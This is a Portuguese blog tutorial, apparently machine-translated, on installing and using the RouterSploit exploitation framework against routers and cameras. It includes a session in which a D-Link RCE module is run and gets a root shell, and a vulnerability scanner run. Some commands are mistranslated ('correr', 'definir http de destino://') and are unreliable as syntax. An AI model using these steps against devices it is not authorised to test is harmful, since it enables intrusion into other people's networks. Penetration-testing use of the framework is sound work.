Ferramentas do Linux

RouterSploit – Tutorial Completo do Exploitation Framework [2020]

RouterSploit é uma estrutura de exploração incrível feita especificamente para dispositivos embarcados.

Esta ferramenta pode ser usada pelo pentester para verificar a segurança de câmeras e roteadores.

Destaques do RouterSploit:

  • Codificado em Python.
  • Interface da Linha de comando.
  • Suporte Docker.
  • Ferramentas Modulares.

SO compatível:

  1. Mac OS.
  2. Linux.
  3. Telefone Android.
  4. janelas.

Instalando o RouterSploit:

Requisitos:

  • futuro
  • solicitações de
  • paramiko
  • pysnmp
  • criptografado

Opcional:

  • bluepy – bluetooth low energy

Instalando no Kali Linux:

Siga os comandos abaixo:

apt-get install python3-pip
git clone https://www.github.com/threat9/routersploit
cd routersploit
python3 -m pip install -r requirements.txt
python3 rsf.py

Suporte Bluetooth de baixa energia:

apt-get install libglib2.0-dev
python3 -m pip install bluepy
python3 rsf.py

Instalando no Ubuntu:

Siga os comandos abaixo:

sudo add-apt-repository universe
sudo apt-get install git python3-pip
git clone https://www.github.com/threat9/routersploit
cd routersploit
python3 -m pip install setuptools
python3 -m pip install -r requirements.txt
python3 rsf.py

Suporte Bluetooth de baixa energia:

apt-get install libglib2.0-dev
python3 -m pip install bluepy
python3 rsf.py

Instalando no MacOS:

Siga os comandos abaixo:

git clone https://www.github.com/threat9/routersploit
cd routersploit
sudo python3 -m pip install -r requirements.txt
python3 rsf.py

Instalando no Docker:

Siga os comandos abaixo:

git clone https://www.github.com/threat9/routersploit
cd routersploit
docker build -t routersploit .
docker run -it --rm routersploit

Como atualizar o RouterSploit?

Você precisa atualizar o RouterSploit com frequência para evitar transtornos.

Novos módulos são enviados quase todos os dias.

cd routersploit
git pull

Como usar o RouterSploit?

Uso

raiz@kalidev:~/git/routersploit# ./rsf.py
 ______            _            _____       _       _ _
 | ___ \          | |          /  ___|     | |     (_) |
 | |_/ /___ _ _| |_ ___ _ __ `--. _ __ | | ___ _| |_
 |    // _ \| | | | __/ _ \ '__|`--. \ '_ \| |/ _ \| | __|
 | |\ \ (_) | |_| | ||  __/ |  /\__/ / |_) | | (_) | | |_
 \_| \____/ __,_|\_____|_|  \____/| .__/|_|\___/|_|\__|
                                     | |
       Estrutura de Exploração para    |_|   by Threat9
            Embedded Devices
  
 Codename   : I Knew You Were Trouble
 Version    : 3.3.0
 Pagina inicial   : https://www.threat9.com/ - @threatnine
 Join Slack : routersploit.slack.com

 Join Threat9 Beta Program - https://www.threat9.com/

 Exploits: 128 Scanners: 4 Créditos: 165 Genérico: 4 Cargas úteis: 32 Codificadores: 6

rsf >

Explorações:

Para pré-formar a exploração, basta escolher o módulo e definir o alvo:

rsf > use exploits/
exploits/2wire/ exploits/asmax/ exploits/asus/ exploits/cisco/ exploits/dlink/ exploits/fortinet/ exploits/juniper/ exploits/linksys/ exploits/multi/ exploits/netgear/
rsf > use exploits/dlink/dir_300_600_rce
rsf (D-LINK DIR-300 & DIR-600RCE) >

Para completar use a tecla tab.

Para exibir opções, tipo show:

rsf (D-LINK DIR-300 & DIR-600RCE) > show options

Target options:


   Nome Configurações atuais Descrição                                
   ----       ----------------     -----------                                
   alvo Endereço de destino, por exemplo. http://192.168.1.1     
   porta       80                   Porta alvo

Usar run ou exploit comando para explorar o alvo:

rsf (D-LINK DIR-300 & DIR-600RCE) > correr
[+] O alvo é vulnerável
[*] Invocando loop de comando...
cmd > whoami
root

Para definir opções:

rsf (D-LINK DIR-300 & DIR-600RCE) > definir http de destino://192.168.1.1 [+] {'target': 'http://192.168.1.1'}

É possível verificar se o alvo está vulnerável a uma exploração específica:

rsf (D-LINK DIR-300 & DIR-600RCE) > verificar
[+] O alvo é vulnerável

Correr show info para exibir informações sobre a exploração.

Verificando alvos vulneráveis:

Os scanners permitem verificar rapidamente se o alvo está vulnerável a alguma exploração.

Use os mesmos comandos para exibir/definir opções, e também para correr.

rsf (Scanner DLink) > correr
[+] exploits/dlink/dwr_932_info_disclosure é vulnerável
[-] exploits/dlink/dir_300_320_615_auth_bypass não é vulnerável
[-] exploits/dlink/dsl_2750b_info_disclosure não é vulnerável
[-] exploits/dlink/dns_320l_327l_rce não é vulnerável
[-] exploits/dlink/dir_645_password_disclosure não é vulnerável
[-] exploits/dlink/dir_300_600_615_info_disclosure não é vulnerável
[-] exploits/dlink/dir_300_600_rce não é vulnerável

[+] O dispositivo está vulnerável!
- explorações/dlink/dwr_932_info_disclosure

RouterSploit oficial

Leia também: 1337procuração

Palavras Finais:

RouterSploit é uma ferramenta incrível de usar.

Se você enfrentar qualquer problema relacionado ao RouterSploit. Certifique-se de comentar abaixo. Nossa equipe CSHAWK entrará em contato com você o mais rápido possível.

O Suyash

Este é Suyash da Índia. Um entusiasta da cibersegurança, youtuber, Blogueiro, Freelancer e pentester. Ele costuma escrever artigos para compartilhar seu conhecimento com o mundo.

Recent Posts

Top Apps and Software for Budding Musicians

With the rise of many technological trends, all industries are reaping the benefits. Different technologies

10 months ago

Principal 9 Tips to Keep Yourself Safe When Gaming Online

Online gaming is the latest normal in today’s fast-paced digital world. The internet now offers

11 months ago

Pros And Cons Of Getting A Tax Extension for Your Fintech Business

Tax season: the time of year many individuals and businesses dread. The weight of ensuring

11 months ago

Principal 5 Games Which Became Most Popular in 2023 – Detailed Review!

As we enter in the final months of 2023, we can talk more clearly about

12 months ago

A lenda do Minecraft será gratuita?

Since its release in 2011, Minecraft has become one of the most played video games

1 year ago

O Minecraft Java pode ser jogado com o Xbox?

Minecraft has been active for more than a decade, and in that time it has

1 year ago

This website uses cookies.